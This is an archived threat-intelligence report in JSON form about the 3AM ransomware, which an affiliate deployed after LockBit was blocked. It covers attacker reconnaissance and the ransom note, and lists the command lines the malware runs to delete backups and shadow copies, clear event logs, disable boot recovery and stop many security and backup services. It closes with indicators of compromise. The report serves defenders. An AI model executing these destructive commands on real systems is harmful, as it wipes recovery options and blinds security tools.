{
	"id": "7d4f9ac4-bd24-4c18-af45-b0a5e5c570fa",
	"created_at": "2026-04-06T00:14:34.930946Z",
	"updated_at": "2026-04-10T03:24:23.981696Z",
	"deleted_at": null,
	"sha1_hash": "f26db4677019684a3da2ea08b7d6608cec77cb43",
	"title": "3AM: New Ransomware Family Used As Fallback in Failed LockBit Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 51015,
	"plain_text": "3AM: New Ransomware Family Used As Fallback in Failed\r\nLockBit Attack\r\nBy About the Author\r\nArchived: 2026-04-05 13:32:40 UTC\r\nA new ransomware family calling itself 3AM has emerged. To date, the ransomware has only been used in a\r\nlimited fashion. Symantec’s Threat Hunter Team, part of Broadcom, has seen it used in a single attack by a\r\nransomware affiliate that attempted to deploy LockBit on a target’s network and then switched to 3AM when\r\nLockBit was blocked.\r\n3AM is written in Rust and appears to be a completely new malware family. The ransomware attempts to stop\r\nmultiple services on the infected computer before it begins encrypting files. Once encryption is complete, it\r\nattempts to delete Volume Shadow (VSS) copies. It is still unclear whether its authors have any links to known\r\ncybercrime organizations. \r\nAttack Preparation\r\nThe first suspicious activity from the threat actor involved the use of the gpresult command to dump the policy\r\nsettings enforced on the computer for a specified user. The attacker also executed various Cobalt Strike\r\ncomponents and tried to escalate privileges on the computer using PsExec.\r\nThe attackers then ran reconnaissance commands such as whoami, netstat, quser, and net share, and tried to\r\nenumerate other servers for lateral movement with the quser and net view commands. They also added a new user\r\nfor persistence and used the Wput tool to exfiltrate the victims’ files to their own FTP server.\r\nThe attackers first attempted to use the LockBit ransomware but when that was blocked, they resorted to 3AM\r\ninstead. The use of 3AM was only partially successful. The attackers only managed to deploy it to three machines\r\non the organization's network and it was blocked on two of those three computers.\r\n3AM Analysis\r\n3AM is so-called because it appends encrypted files with the extension .threeamtime. The ransom note also makes\r\nreference to 3AM:\r\nHello. \"3 am\" The time of mysticism, isn't it?\r\nAll your files are mysteriously encrypted, and the systems \"show no signs of life\", the backups disappeared. But\r\nwe can correct this very quickly and return all your files and operation of the systems to original state.\r\nAll your attempts to restore data by himself will definitely lead to their damage and the impossibility of recovery.\r\nWe are not recommended to you to do it on our own!!! (or do at your own peril and risk).\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 1 of 7\n\nThere is another important point: we stole a fairly large amount of sensitive data from your local network:\r\nfinancial documents; personal information of your employees, customers, partners; work documentation, postal\r\ncorrespondence and much more.\r\nWe prefer to keep it secret, we have no goal to destroy your business. Therefore can be no leakage on our part.\r\nWe propose to reach an agreement and conclude a deal.\r\nOtherwise, your data will be sold to DarkNet/DarkWeb. One can only guess how they will be used.\r\nPlease contact us as soon as possible, using Tor-browser:\r\nhttp://threeam7[REDACTED].onion/recovery \r\nAccess key:\r\n[32 CHARS SPECIFIED BY -k COMMAND LINE PARAMETER]\r\nThe ransomware is a 64-bit executable written in Rust and it recognises the following command-line parameters:\r\n\"-k\" – 32 Base64 characters, referred to as \"Access key\" in the ransom note\r\n\"-p\" – Unknown\r\n\"-h\" – Unknown\r\n\"-m\" – Method, where the code checks one of two values before running encryption logic:\r\n\"local\"\r\n\"net\"\r\n\"-s\" – determines offsets within files for encryption to control encryption speed. This is expressed in the\r\nform of decimal digits.\r\nThe command-line parameters \"-m\" and \"-h\" are mutually exclusive. The usage of the “-h” and “-m” parameters\r\nand its values “local” and “net” are very similar to arguments used by Conti.\r\nWhen the malware is executed, it attempts to run the following commands, most of which attempt to stop various\r\nsecurity and backup related software: \r\n\"netsh.exe\" advfirewall firewall set rule \"group=”Network Discovery”\" new enable=Yes\r\n\"wbadmin.exe\" delete systemstatebackup -keepVersions:0 -quiet\r\n\"wbadmin.exe\" DELETE SYSTEMSTATEBACKUP\r\n\"wbadmin.exe\" DELETE SYSTEMSTATEBACKUP -deleteOldest\r\n\"bcdedit.exe\" /set {default} recoveryenabled No\r\n\"bcdedit.exe\" /set {default} bootstatuspolicy ignoreallfailures\r\n\"wmic.exe\" SHADOWCOPY DELETE /nointeractive\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 2 of 7\n\n\"cmd.exe\" /c wevtutil cl security\r\n\"cmd.exe\" /c wevtutil cl system\r\n\"cmd.exe\" /c wevtutil cl application\r\n\"net\" stop /y vmcomp\r\n\"net\" stop /y vmwp\r\n\"net\" stop /y veeam\r\n\"net\" stop /y Back\r\n\"net\" stop /y xchange\r\n\"net\" stop /y backup\r\n\"net\" stop /y Backup\r\n\"net\" stop /y acronis\r\n\"net\" stop /y AcronisAgent\r\n\"net\" stop /y AcrSch2Svc\r\n\"net\" stop /y sql\r\n\"net\" stop /y Enterprise\r\n\"net\" stop /y Veeam\r\n\"net\" stop /y VeeamTransportSvc\r\n\"net\" stop /y VeeamNFSSvc\r\n\"net\" stop /y AcrSch\r\n\"net\" stop /y bedbg\r\n\"net\" stop /y DCAgent\r\n\"net\" stop /y EPSecurity\r\n\"net\" stop /y EPUpdate\r\n\"net\" stop /y Eraser\r\n\"net\" stop /y EsgShKernel\r\n\"net\" stop /y FA_Scheduler\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 3 of 7\n\n\"net\" stop /y IISAdmin\r\n\"net\" stop /y IMAP4\r\n\"net\" stop /y MBAM\r\n\"net\" stop /y Endpoint\r\n\"net\" stop /y Afee\r\n\"net\" stop /y McShield\r\n\"net\" stop /y task\r\n\"net\" stop /y mfemms\r\n\"net\" stop /y mfevtp\r\n\"net\" stop /y mms\r\n\"net\" stop /y MsDts\r\n\"net\" stop /y Exchange\r\n\"net\" stop /y ntrt\r\n\"net\" stop /y PDVF\r\n\"net\" stop /y POP3\r\n\"net\" stop /y Report\r\n\"net\" stop /y RESvc\r\n\"net\" stop /y Monitor\r\n\"net\" stop /y Smcinst\r\n\"net\" stop /y SmcService\r\n\"net\" stop /y SMTP\r\n\"net\" stop /y SNAC\r\n\"net\" stop /y swi_\r\n\"net\" stop /y CCSF\r\n\"net\" stop /y ccEvtMgr\r\n\"net\" stop /y ccSetMgr\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 4 of 7\n\n\"net\" stop /y TrueKey\r\n\"net\" stop /y tmlisten\r\n\"net\" stop /y UIODetect\r\n\"net\" stop /y W3S\r\n\"net\" stop /y WRSVC\r\n\"net\" stop /y NetMsmq\r\n\"net\" stop /y ekrn\r\n\"net\" stop /y EhttpSrv\r\n\"net\" stop /y ESHASRV\r\n\"net\" stop /y AVP\r\n\"net\" stop /y klnagent\r\n\"net\" stop /y wbengine\r\n\"net\" stop /y KAVF\r\n\"net\" stop /y mfefire\r\n\"net\" stop /y svc$\r\n\"net\" stop /y memtas\r\n\"net\" stop /y mepocs\r\n\"net\" stop /y GxVss\r\n\"net\" stop /y GxCVD\r\n\"net\" stop /y GxBlr\r\n\"net\" stop /y GxFWD\r\n\"net\" stop /y GxCIMgr\r\n\"net\" stop /y BackupExecVSSProvider\r\n\"net\" stop /y BackupExecManagementService\r\n\"net\" stop /y BackupExecJobEngine\r\n\"net\" stop /y BackupExecDiveciMediaService\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 5 of 7\n\n\"net\" stop /y BackupExecAgentBrowser\r\n\"net\" stop /y BackupExecAgentAccelerator\r\n\"net\" stop /y vss\r\n\"net\" stop /y BacupExecRPCService\r\n\"net\" stop /y CASAD2WebSvc\r\n\"net\" stop /y CAARCUpdateSvc\r\n\"net\" stop /y YooBackup\r\n\"net\" stop /y YooIT\r\nThe ransomware will then scan the disk and any files matching predefined criteria are encrypted and the original\r\nfiles are deleted. The malware will then create the file \"RECOVER-FILES.txt\" in each scanned folder. This file\r\ncontains the ransom note.\r\nThe encrypted files contain a marker string \"0x666\" followed by the data appended by the ransomware.\r\nAfter encryption, the malware attempts to run the following command to delete volume shadow backup copies:\r\nvssadmin.exe delete shadows /all /quiet\r\nWarning Signs\r\nRansomware affiliates have become increasingly independent from ransomware operators and this is not the first\r\ntime Symantec has seen an attacker attempt to deploy two different kinds of ransomware in a single attack. \r\nNew ransomware families appear frequently and most disappear just as quickly or never manage to gain\r\nsignificant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may\r\nbe of interest to attackers and could be seen again in the future. \r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSHA256 file hashes:\r\n079b99f6601f0f6258f4220438de4e175eb4853649c2d34ada72cce6b1702e22 – LockBit\r\n307a1217aac33c4b7a9cd923162439c19483e952c2ceb15aa82a98b46ff8942e – 3AM\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 6 of 7\n\n680677e14e50f526cced739890ed02fc01da275f9db59482d96b96fbc092d2f4 – Cobalt Strike\r\n991ee9548b55e5c815cc877af970542312cff79b3ba01a04a469b645c5d880af – Cobalt Strike\r\necbdb9cb442a2c712c6fb8aee0ae68758bc79fa064251bab53b62f9e7156febc – Cobalt Strike\r\nNetwork indicators:\r\n185.202.0[.]111\r\n212.18.104[.]6\r\n85.159.229[.]62\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit"
	],
	"report_names": [
		"3am-ransomware-lockbit"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434474,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f26db4677019684a3da2ea08b7d6608cec77cb43.pdf",
		"text": "https://archive.orkl.eu/f26db4677019684a3da2ea08b7d6608cec77cb43.txt",
		"img": "https://archive.orkl.eu/f26db4677019684a3da2ea08b7d6608cec77cb43.jpg"
	}
}